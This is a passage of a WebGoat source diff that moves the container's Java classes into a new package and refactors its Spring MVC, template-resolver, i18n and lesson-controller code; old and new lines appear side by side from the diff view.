import org.thymeleaf.templateresource.StringTemplateResource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Map;
import java.util.Set; import java.util.Set;
/** /**
* Configuration for Spring MVC * Configuration for Spring MVC
*/ */
@Configuration @Configuration
@RequiredArgsConstructor
public class MvcConfiguration implements WebMvcConfigurer { public class MvcConfiguration implements WebMvcConfigurer {
private static final String UTF8 = "UTF-8"; private static final String UTF8 = "UTF-8";
private final LessonScanner lessonScanner;
@Override @Override
public void addViewControllers(ViewControllerRegistry registry) { public void addViewControllers(ViewControllerRegistry registry) {
@ -69,30 +81,55 @@ public class MvcConfiguration implements WebMvcConfigurer {
registry.addViewController("/lesson_content").setViewName("lesson_content"); registry.addViewController("/lesson_content").setViewName("lesson_content");
registry.addViewController("/start.mvc").setViewName("main_new"); registry.addViewController("/start.mvc").setViewName("main_new");
registry.addViewController("/scoreboard").setViewName("scoreboard"); registry.addViewController("/scoreboard").setViewName("scoreboard");
//registry.addViewController("/list_users").setViewName("list_users");
} }
@Bean @Bean
public ViewResolver viewResolver(SpringTemplateEngine thymeleafTemplateEngine) { public ViewResolver viewResolver(SpringTemplateEngine thymeleafTemplateEngine) {
ThymeleafViewResolver resolver = new ThymeleafViewResolver(); ThymeleafViewResolver resolver = new ThymeleafViewResolver();
resolver.setTemplateEngine(thymeleafTemplateEngine); resolver.setTemplateEngine(thymeleafTemplateEngine);
resolver.setCharacterEncoding("UTF-8"); resolver.setCharacterEncoding(StandardCharsets.UTF_8.displayName());
return resolver; return resolver;
} }
/**
* Responsible for loading lesson templates based on Thymeleaf, for example:
*
* <div th:include="/lessons/spoofcookie/templates/spoofcookieform.html" id="content"></div>
*/
@Bean
public ITemplateResolver lessonThymeleafTemplateResolver(ResourceLoader resourceLoader) {
var resolver = new FileTemplateResolver() {
@Override
protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
try (var is = resourceLoader.getResource("classpath:" + resourceName).getInputStream()) {
return new StringTemplateResource(new String(is.readAllBytes(), StandardCharsets.UTF_8));
} catch (IOException e) {
return null;
}
}
};
resolver.setOrder(1);
return resolver;
}
/**
* Loads all normal WebGoat specific Thymeleaf templates
*/
@Bean @Bean
public ITemplateResolver springThymeleafTemplateResolver(ApplicationContext applicationContext) { public ITemplateResolver springThymeleafTemplateResolver(ApplicationContext applicationContext) {
SpringResourceTemplateResolver resolver = new SpringResourceTemplateResolver(); SpringResourceTemplateResolver resolver = new SpringResourceTemplateResolver();
resolver.setPrefix("classpath:/templates/"); resolver.setPrefix("classpath:/webgoat/templates/");
resolver.setSuffix(".html"); resolver.setSuffix(".html");
resolver.setTemplateMode(TemplateMode.HTML); resolver.setTemplateMode(TemplateMode.HTML);
resolver.setOrder(2); resolver.setOrder(2);
resolver.setCacheable(false);
resolver.setCharacterEncoding(UTF8); resolver.setCharacterEncoding(UTF8);
resolver.setApplicationContext(applicationContext); resolver.setApplicationContext(applicationContext);
return resolver; return resolver;
} }
/**
* Loads the html for the complete lesson, see lesson_content.html
*/
@Bean @Bean
public LessonTemplateResolver lessonTemplateResolver(ResourceLoader resourceLoader) { public LessonTemplateResolver lessonTemplateResolver(ResourceLoader resourceLoader) {
LessonTemplateResolver resolver = new LessonTemplateResolver(resourceLoader); LessonTemplateResolver resolver = new LessonTemplateResolver(resourceLoader);
@ -102,9 +139,12 @@ public class MvcConfiguration implements WebMvcConfigurer {
return resolver; return resolver;
} }
/**
* Loads the lesson asciidoc.
*/
@Bean @Bean
public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(Language language) { public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(ResourceLoader resourceLoader) {
AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(language); AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(resourceLoader);
resolver.setCacheable(false); resolver.setCacheable(false);
resolver.setOrder(1); resolver.setOrder(1);
resolver.setCharacterEncoding(UTF8); resolver.setCharacterEncoding(UTF8);
@ -114,26 +154,37 @@ public class MvcConfiguration implements WebMvcConfigurer {
@Bean @Bean
public SpringTemplateEngine thymeleafTemplateEngine(ITemplateResolver springThymeleafTemplateResolver, public SpringTemplateEngine thymeleafTemplateEngine(ITemplateResolver springThymeleafTemplateResolver,
LessonTemplateResolver lessonTemplateResolver, LessonTemplateResolver lessonTemplateResolver,
AsciiDoctorTemplateResolver asciiDoctorTemplateResolver) { AsciiDoctorTemplateResolver asciiDoctorTemplateResolver,
ITemplateResolver lessonThymeleafTemplateResolver) {
SpringTemplateEngine engine = new SpringTemplateEngine(); SpringTemplateEngine engine = new SpringTemplateEngine();
engine.setEnableSpringELCompiler(true); engine.setEnableSpringELCompiler(true);
engine.addDialect(new SpringSecurityDialect()); engine.addDialect(new SpringSecurityDialect());
engine.setTemplateResolvers( engine.setTemplateResolvers(
Set.of(lessonTemplateResolver, asciiDoctorTemplateResolver, springThymeleafTemplateResolver)); Set.of(lessonTemplateResolver, asciiDoctorTemplateResolver, lessonThymeleafTemplateResolver, springThymeleafTemplateResolver));
return engine; return engine;
} }
@Override @Override
public void addResourceHandlers(ResourceHandlerRegistry registry) { public void addResourceHandlers(ResourceHandlerRegistry registry) {
registry.addResourceHandler("/images/**").addResourceLocations("classpath:/images/"); //WebGoat internal
registry.addResourceHandler("/lesson_js/**").addResourceLocations("classpath:/js/"); registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webgoat/static/css/");
registry.addResourceHandler("/lesson_css/**").addResourceLocations("classpath:/css/"); registry.addResourceHandler("/js/**")
registry.addResourceHandler("/video/**").addResourceLocations("classpath:/video/"); .addResourceLocations("classpath:/webgoat/static/js/");
registry.addResourceHandler("/plugins/**").addResourceLocations("classpath:/webgoat/static/plugins/");
registry.addResourceHandler("/fonts/**").addResourceLocations("classpath:/webgoat/static/fonts/");
//WebGoat lessons
registry.addResourceHandler("/images/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/images/").toArray(String[]::new));
registry.addResourceHandler("/lesson_js/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/js/").toArray(String[]::new));
registry.addResourceHandler("/lesson_css/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/css/").toArray(String[]::new));
registry.addResourceHandler("/lesson_templates/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/templates/").toArray(String[]::new));
registry.addResourceHandler("/video/**").addResourceLocations(lessonScanner.applyPattern("classpath:/lessons/%s/video/").toArray(String[]::new));
} }
@Bean @Bean
public PluginMessages pluginMessages(Messages messages, Language language) { public PluginMessages pluginMessages(Messages messages, Language language,
PluginMessages pluginMessages = new PluginMessages(messages, language); ResourcePatternResolver resourcePatternResolver) {
PluginMessages pluginMessages = new PluginMessages(messages, language, resourcePatternResolver);
pluginMessages.setDefaultEncoding("UTF-8"); pluginMessages.setDefaultEncoding("UTF-8");
pluginMessages.setBasenames("i18n/WebGoatLabels"); pluginMessages.setBasenames("i18n/WebGoatLabels");
pluginMessages.setFallbackToSystemLocale(false); pluginMessages.setFallbackToSystemLocale(false);
@ -156,8 +207,7 @@ public class MvcConfiguration implements WebMvcConfigurer {
@Bean @Bean
public LocaleResolver localeResolver() { public LocaleResolver localeResolver() {
SessionLocaleResolver slr = new SessionLocaleResolver(); return new SessionLocaleResolver();
return slr;
} }
@Bean @Bean

12
webgoat-container/src/main/java/org/owasp/webgoat/WebGoat.java → src/main/java/org/owasp/webgoat/container/WebGoat.java
View File

@ -29,13 +29,16 @@
* @since October 28, 2003 * @since October 28, 2003
*/ */
package org.owasp.webgoat; package org.owasp.webgoat.container;
import org.owasp.webgoat.session.UserSessionData; import org.owasp.webgoat.container.session.UserSessionData;
import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.container.session.WebSession;
import org.springframework.beans.factory.annotation.Value; import org.springframework.beans.factory.annotation.Value;
import org.springframework.boot.autoconfigure.EnableAutoConfiguration;
import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.PropertySource;
import org.springframework.context.annotation.Scope; import org.springframework.context.annotation.Scope;
import org.springframework.context.annotation.ScopedProxyMode; import org.springframework.context.annotation.ScopedProxyMode;
import org.springframework.web.client.RestTemplate; import org.springframework.web.client.RestTemplate;
@ -43,6 +46,9 @@ import org.springframework.web.client.RestTemplate;
import java.io.File; import java.io.File;
@Configuration @Configuration
@ComponentScan(basePackages = { "org.owasp.webgoat.container", "org.owasp.webgoat.lessons"})
@PropertySource("classpath:application-webgoat.properties")
@EnableAutoConfiguration
public class WebGoat { public class WebGoat {
@Bean(name = "pluginTargetDirectory") @Bean(name = "pluginTargetDirectory")

6
webgoat-container/src/main/java/org/owasp/webgoat/WebSecurityConfig.java → src/main/java/org/owasp/webgoat/container/WebSecurityConfig.java
View File

@ -28,10 +28,10 @@
* @since December 12, 2015 * @since December 12, 2015
*/ */
package org.owasp.webgoat; package org.owasp.webgoat.container;
import lombok.AllArgsConstructor; import lombok.AllArgsConstructor;
import org.owasp.webgoat.users.UserService; import org.owasp.webgoat.container.users.UserService;
import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Configuration;
@ -77,7 +77,7 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
@Autowired @Autowired
public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception { public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
auth.userDetailsService(userDetailsService); //.passwordEncoder(bCryptPasswordEncoder()); auth.userDetailsService(userDetailsService);
} }
@Bean @Bean

21
src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java Normal file
View File

@ -0,0 +1,21 @@
package org.owasp.webgoat.container;
import lombok.RequiredArgsConstructor;
import org.springframework.context.ApplicationContext;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.servlet.ModelAndView;
@Controller
@RequiredArgsConstructor
public class WebWolfRedirect {
private final ApplicationContext applicationContext;
@GetMapping("/WebWolf")
public ModelAndView openWebWolf() {
var url = applicationContext.getEnvironment().getProperty("webwolf.url");
return new ModelAndView("redirect:" + url + "/home");
}
}

2
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/EnvironmentExposure.java → src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import org.springframework.beans.BeansException; import org.springframework.beans.BeansException;
import org.springframework.context.ApplicationContext; import org.springframework.context.ApplicationContext;

2
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/OperatingSystemMacro.java → src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import org.asciidoctor.ast.ContentNode; import org.asciidoctor.ast.ContentNode;
import org.asciidoctor.extension.InlineMacroProcessor; import org.asciidoctor.extension.InlineMacroProcessor;

8
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/UsernameMacro.java → src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
View File

@ -1,8 +1,8 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import org.asciidoctor.ast.ContentNode; import org.asciidoctor.ast.ContentNode;
import org.asciidoctor.extension.InlineMacroProcessor; import org.asciidoctor.extension.InlineMacroProcessor;
import org.owasp.webgoat.users.WebGoatUser; import org.owasp.webgoat.container.users.WebGoatUser;
import org.springframework.security.core.context.SecurityContextHolder; import org.springframework.security.core.context.SecurityContextHolder;
import java.util.Map; import java.util.Map;
@ -21,8 +21,8 @@ public class UsernameMacro extends InlineMacroProcessor {
public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) { public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
var auth = SecurityContextHolder.getContext().getAuthentication(); var auth = SecurityContextHolder.getContext().getAuthentication();
var username = "unknown"; var username = "unknown";
if (auth.getPrincipal() instanceof WebGoatUser) { if (auth.getPrincipal() instanceof WebGoatUser webGoatUser) {
username = ((WebGoatUser) auth.getPrincipal()).getUsername(); username = webGoatUser.getUsername();
} }
//see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used //see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used

2
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatTmpDirMacro.java → src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import org.asciidoctor.ast.ContentNode; import org.asciidoctor.ast.ContentNode;
import org.asciidoctor.extension.InlineMacroProcessor; import org.asciidoctor.extension.InlineMacroProcessor;

2
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebGoatVersionMacro.java → src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import org.asciidoctor.ast.ContentNode; import org.asciidoctor.ast.ContentNode;
import org.asciidoctor.extension.InlineMacroProcessor; import org.asciidoctor.extension.InlineMacroProcessor;

10
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java → src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import org.asciidoctor.ast.ContentNode; import org.asciidoctor.ast.ContentNode;
import org.asciidoctor.extension.InlineMacroProcessor; import org.asciidoctor.extension.InlineMacroProcessor;
@ -27,7 +27,7 @@ public class WebWolfMacro extends InlineMacroProcessor {
@Override @Override
public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) { public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) {
var env = EnvironmentExposure.getEnv(); var env = EnvironmentExposure.getEnv();
var hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port")); var hostname = determineHost(env.getProperty("webwolf.port"));
var target = (String) attributes.getOrDefault("target", "home"); var target = (String) attributes.getOrDefault("target", "home");
var href = hostname + "/" + target; var href = hostname + "/" + target;
@ -44,7 +44,7 @@ public class WebWolfMacro extends InlineMacroProcessor {
} }
private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) { private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
return attributes.values().stream().filter(a -> a.equals("noLink")).findFirst().isPresent(); return attributes.values().stream().anyMatch(a -> a.equals("noLink"));
} }
/** /**
@ -54,9 +54,9 @@ public class WebWolfMacro extends InlineMacroProcessor {
* You do not have to use the indicated hostname, but if you do, you should define two hosts aliases * You do not have to use the indicated hostname, but if you do, you should define two hosts aliases
* 127.0.0.1 www.webgoat.local www.webwolf.local * 127.0.0.1 www.webgoat.local www.webwolf.local
*/ */
private String determineHost(String host, String port) { private String determineHost(String port) {
HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest(); HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
host = request.getHeader("Host"); String host = request.getHeader("Host");
int semicolonIndex = host.indexOf(":"); int semicolonIndex = host.indexOf(":");
if (semicolonIndex == -1 || host.endsWith(":80")) { if (semicolonIndex == -1 || host.endsWith(":80")) {
host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local"); host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");

3
webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfRootMacro.java → src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.asciidoc; package org.owasp.webgoat.container.asciidoc;
import java.util.Map; import java.util.Map;
@ -18,6 +18,7 @@ public class WebWolfRootMacro extends WebWolfMacro {
super(macroName, config); super(macroName, config);
} }
@Override
protected boolean includeWebWolfContext() { protected boolean includeWebWolfContext() {
return false; return false;
} }

17
webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentEndpoint.java → src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
View File

@ -23,16 +23,17 @@
* <p> * <p>
*/ */
package org.owasp.webgoat.assignments; package org.owasp.webgoat.container.assignments;
import lombok.Getter; import lombok.Getter;
import org.owasp.webgoat.i18n.PluginMessages; import org.owasp.webgoat.container.i18n.PluginMessages;
import org.owasp.webgoat.session.UserSessionData; import org.owasp.webgoat.container.lessons.Initializeable;
import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.container.session.UserSessionData;
import org.owasp.webgoat.users.UserTrackerRepository; import org.owasp.webgoat.container.session.WebSession;
import org.owasp.webgoat.container.users.WebGoatUser;
import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Autowired;
public abstract class AssignmentEndpoint { public abstract class AssignmentEndpoint implements Initializeable {
@Autowired @Autowired
private WebSession webSession; private WebSession webSession;
@ -83,4 +84,8 @@ public abstract class AssignmentEndpoint {
protected AttackResult.AttackResultBuilder informationMessage(AssignmentEndpoint assignment) { protected AttackResult.AttackResultBuilder informationMessage(AssignmentEndpoint assignment) {
return AttackResult.builder(messages).lessonCompleted(false).assignment(assignment); return AttackResult.builder(messages).lessonCompleted(false).assignment(assignment);
} }
@Override
public void initialize(WebGoatUser user) {
}
} }

2
webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentHints.java → src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.assignments; package org.owasp.webgoat.container.assignments;
import java.lang.annotation.ElementType; import java.lang.annotation.ElementType;
import java.lang.annotation.Retention; import java.lang.annotation.Retention;

2
webgoat-container/src/main/java/org/owasp/webgoat/assignments/AssignmentPath.java → src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.assignments; package org.owasp.webgoat.container.assignments;
import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.RequestMethod;

11
webgoat-container/src/main/java/org/owasp/webgoat/assignments/AttackResult.java → src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
View File

@ -23,11 +23,12 @@
* <p> * <p>
*/ */
package org.owasp.webgoat.assignments; package org.owasp.webgoat.container.assignments;
import lombok.Getter; import lombok.Getter;
import org.apache.commons.lang3.StringEscapeUtils; import org.owasp.webgoat.container.i18n.PluginMessages;
import org.owasp.webgoat.i18n.PluginMessages;
import static org.apache.commons.text.StringEscapeUtils.escapeJson;
public class AttackResult { public class AttackResult {
@ -107,8 +108,8 @@ public class AttackResult {
public AttackResult(boolean lessonCompleted, String feedback, String output, String assignment, boolean attemptWasMade) { public AttackResult(boolean lessonCompleted, String feedback, String output, String assignment, boolean attemptWasMade) {
this.lessonCompleted = lessonCompleted; this.lessonCompleted = lessonCompleted;
this.feedback = StringEscapeUtils.escapeJson(feedback); this.feedback = escapeJson(feedback);
this.output = StringEscapeUtils.escapeJson(output); this.output = escapeJson(output);
this.assignment = assignment; this.assignment = assignment;
this.attemptWasMade = attemptWasMade; this.attemptWasMade = attemptWasMade;
} }

12
webgoat-container/src/main/java/org/owasp/webgoat/assignments/LessonTrackerInterceptor.java → src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
View File

@ -20,11 +20,11 @@
* Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects. * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
*/ */
package org.owasp.webgoat.assignments; package org.owasp.webgoat.container.assignments;
import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.container.session.WebSession;
import org.owasp.webgoat.users.UserTracker; import org.owasp.webgoat.container.users.UserTracker;
import org.owasp.webgoat.users.UserTrackerRepository; import org.owasp.webgoat.container.users.UserTrackerRepository;
import org.springframework.core.MethodParameter; import org.springframework.core.MethodParameter;
import org.springframework.http.MediaType; import org.springframework.http.MediaType;
import org.springframework.http.converter.HttpMessageConverter; import org.springframework.http.converter.HttpMessageConverter;
@ -51,8 +51,8 @@ public class LessonTrackerInterceptor implements ResponseBodyAdvice<Object> {
@Override @Override
public Object beforeBodyWrite(Object o, MethodParameter methodParameter, MediaType mediaType, Class<? extends HttpMessageConverter<?>> aClass, ServerHttpRequest serverHttpRequest, ServerHttpResponse serverHttpResponse) { public Object beforeBodyWrite(Object o, MethodParameter methodParameter, MediaType mediaType, Class<? extends HttpMessageConverter<?>> aClass, ServerHttpRequest serverHttpRequest, ServerHttpResponse serverHttpResponse) {
if (o != null && o instanceof AttackResult) { if (o instanceof AttackResult attackResult) {
trackProgress((AttackResult) o); trackProgress(attackResult);
} }
return o; return o;
} }

40
webgoat-container/src/main/java/org/owasp/webgoat/controller/StartLesson.java → src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
View File

@ -29,21 +29,16 @@
* @since October 28, 2003 * @since October 28, 2003
*/ */
package org.owasp.webgoat.controller; package org.owasp.webgoat.container.controller;
import org.owasp.webgoat.lessons.Lesson; import org.owasp.webgoat.container.session.Course;
import org.owasp.webgoat.session.Course; import org.owasp.webgoat.container.session.WebSession;
import org.owasp.webgoat.session.WebSession;
import org.springframework.security.core.context.SecurityContext;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.stereotype.Controller; import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.ModelAndView;
import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletRequest;
import java.util.List;
import java.util.Optional;
@Controller @Controller
@ -52,7 +47,7 @@ public class StartLesson {
private final WebSession ws; private final WebSession ws;
private final Course course; private final Course course;
public StartLesson(final WebSession ws, final Course course) { public StartLesson(WebSession ws, Course course) {
this.ws = ws; this.ws = ws;
this.course = course; this.course = course;
} }
@ -64,29 +59,30 @@ public class StartLesson {
*/ */
@RequestMapping(path = "startlesson.mvc", method = {RequestMethod.GET, RequestMethod.POST}) @RequestMapping(path = "startlesson.mvc", method = {RequestMethod.GET, RequestMethod.POST})
public ModelAndView start() { public ModelAndView start() {
ModelAndView model = new ModelAndView(); var model = new ModelAndView();
model.addObject("course", course); model.addObject("course", course);
model.addObject("lesson", ws.getCurrentLesson()); model.addObject("lesson", ws.getCurrentLesson());
model.setViewName("lesson_content"); model.setViewName("lesson_content");
return model; return model;
} }
@RequestMapping(value = {"*.lesson"}, produces = "text/html") @RequestMapping(value = {"*.lesson"}, produces = "text/html")
public ModelAndView lessonPage(HttpServletRequest request) { public ModelAndView lessonPage(HttpServletRequest request) {
// I will set here the thymeleaf fragment location based on the resource requested. var model = new ModelAndView("lesson_content");
ModelAndView model = new ModelAndView(); var path = request.getRequestURL().toString(); // we now got /a/b/c/AccessControlMatrix.lesson
SecurityContext context = SecurityContextHolder.getContext(); //TODO this should work with the security roles of Spring var lessonName = path.substring(path.lastIndexOf('/') + 1, path.indexOf(".lesson"));
//GrantedAuthority authority = context.getAuthentication().getAuthorities().iterator().next();
String path = request.getRequestURL().toString(); // we now got /a/b/c/AccessControlMatrix.lesson course.getLessons()
String lessonName = path.substring(path.lastIndexOf('/') + 1, path.indexOf(".lesson")); .stream()
List<? extends Lesson> lessons = course.getLessons();
Optional<? extends Lesson> lesson = lessons.stream()
.filter(l -> l.getId().equals(lessonName)) .filter(l -> l.getId().equals(lessonName))
.findFirst(); .findFirst()
ws.setCurrentLesson(lesson.get()); .ifPresent(lesson -> {
model.setViewName("lesson_content"); ws.setCurrentLesson(lesson);
model.addObject("lesson", lesson.get()); model.addObject("lesson", lesson);
});
return model; return model;
} }

9
webgoat-container/src/main/java/org/owasp/webgoat/controller/Welcome.java → src/main/java/org/owasp/webgoat/container/controller/Welcome.java
View File

@ -29,11 +29,10 @@
* @version $Id: $Id * @version $Id: $Id
*/ */
package org.owasp.webgoat.controller; package org.owasp.webgoat.container.controller;
import org.springframework.stereotype.Controller; import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.servlet.ModelAndView; import org.springframework.web.servlet.ModelAndView;
import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletRequest;
@ -56,7 +55,7 @@ public class Welcome {
* @param request a {@link javax.servlet.http.HttpServletRequest} object. * @param request a {@link javax.servlet.http.HttpServletRequest} object.
* @return a {@link org.springframework.web.servlet.ModelAndView} object. * @return a {@link org.springframework.web.servlet.ModelAndView} object.
*/ */
@RequestMapping(path = {"welcome.mvc", "/"}, method = RequestMethod.GET) @GetMapping(path = {"welcome.mvc"})
public ModelAndView welcome(HttpServletRequest request) { public ModelAndView welcome(HttpServletRequest request) {
// set the welcome attribute // set the welcome attribute
@ -69,8 +68,6 @@ public class Welcome {
//go ahead and send them to webgoat (skip the welcome page) //go ahead and send them to webgoat (skip the welcome page)
ModelAndView model = new ModelAndView(); ModelAndView model = new ModelAndView();
//model.setViewName("welcome");
//model.setViewName("main_new");
model.setViewName("forward:/attack?start=true"); model.setViewName("forward:/attack?start=true");
return model; return model;
} }

2
webgoat-container/src/main/java/org/owasp/webgoat/i18n/Language.java → src/main/java/org/owasp/webgoat/container/i18n/Language.java
View File

@ -23,7 +23,7 @@
* <p> * <p>
*/ */
package org.owasp.webgoat.i18n; package org.owasp.webgoat.container.i18n;
import lombok.AllArgsConstructor; import lombok.AllArgsConstructor;
import org.springframework.web.context.request.RequestContextHolder; import org.springframework.web.context.request.RequestContextHolder;

2
webgoat-container/src/main/java/org/owasp/webgoat/i18n/Messages.java → src/main/java/org/owasp/webgoat/container/i18n/Messages.java
View File

@ -23,7 +23,7 @@
* <p> * <p>
*/ */
package org.owasp.webgoat.i18n; package org.owasp.webgoat.container.i18n;
import lombok.AllArgsConstructor; import lombok.AllArgsConstructor;
import org.springframework.context.support.ReloadableResourceBundleMessageSource; import org.springframework.context.support.ReloadableResourceBundleMessageSource;

24
webgoat-container/src/main/java/org/owasp/webgoat/i18n/PluginMessages.java → src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
View File

@ -23,14 +23,12 @@
* <p> * <p>
*/ */
package org.owasp.webgoat.i18n; package org.owasp.webgoat.container.i18n;
import org.springframework.context.support.ReloadableResourceBundleMessageSource; import org.springframework.context.support.ReloadableResourceBundleMessageSource;
import org.springframework.core.io.support.ResourcePatternResolver;
import java.io.IOException; import java.io.IOException;
import java.net.URISyntaxException;
import java.net.URL;
import java.util.Enumeration;
import java.util.Properties; import java.util.Properties;
/** /**
@ -42,12 +40,15 @@ import java.util.Properties;
public class PluginMessages extends ReloadableResourceBundleMessageSource { public class PluginMessages extends ReloadableResourceBundleMessageSource {
private static final String PROPERTIES_SUFFIX = ".properties"; private static final String PROPERTIES_SUFFIX = ".properties";
private Language language; private final Language language;
private final ResourcePatternResolver resourcePatternResolver;
public PluginMessages(Messages messages, Language language) {
public PluginMessages(Messages messages, Language language, ResourcePatternResolver resourcePatternResolver) {
this.language = language; this.language = language;
this.setParentMessageSource(messages); this.setParentMessageSource(messages);
this.setBasename("WebGoatLabels"); this.setBasename("WebGoatLabels");
this.resourcePatternResolver = resourcePatternResolver;
} }
@Override @Override
@ -55,16 +56,15 @@ public class PluginMessages extends ReloadableResourceBundleMessageSource {
Properties properties = new Properties(); Properties properties = new Properties();
long lastModified = System.currentTimeMillis(); long lastModified = System.currentTimeMillis();
Enumeration<URL> resources = null;
try { try {
resources = Thread.currentThread().getContextClassLoader().getResources(filename + PROPERTIES_SUFFIX); var resources = resourcePatternResolver.getResources("classpath:/lessons/**/i18n" +
while (resources.hasMoreElements()) { "/WebGoatLabels" + PROPERTIES_SUFFIX);
URL resource = resources.nextElement(); for (var resource : resources) {
String sourcePath = resource.toURI().toString().replace(PROPERTIES_SUFFIX, ""); String sourcePath = resource.getURI().toString().replace(PROPERTIES_SUFFIX, "");
PropertiesHolder holder = super.refreshProperties(sourcePath, propHolder); PropertiesHolder holder = super.refreshProperties(sourcePath, propHolder);
properties.putAll(holder.getProperties()); properties.putAll(holder.getProperties());
} }
} catch (IOException | URISyntaxException e) { } catch (IOException e) {
logger.error("Unable to read plugin message", e); logger.error("Unable to read plugin message", e);
} }

12
webgoat-container/src/main/java/org/owasp/webgoat/lessons/Assignment.java → src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
View File

@ -1,4 +1,4 @@
package org.owasp.webgoat.lessons; package org.owasp.webgoat.container.lessons;
import lombok.*; import lombok.*;
@ -66,14 +66,4 @@ public class Assignment {
this.hints = hints; this.hints = hints;
} }
/**
* Set path is here to overwrite stored paths.
* Since a stored path can no longer be used in a lesson while
* the lesson (name) itself is still part of the lesson.
*
* @param pathName the path
*/
public void setPath(String pathName) {
this.path = pathName;
}
} }

39
webgoat-container/src/main/java/org/owasp/webgoat/lessons/Category.java → src/main/java/org/owasp/webgoat/container/lessons/Category.java
View File

@ -1,4 +1,4 @@
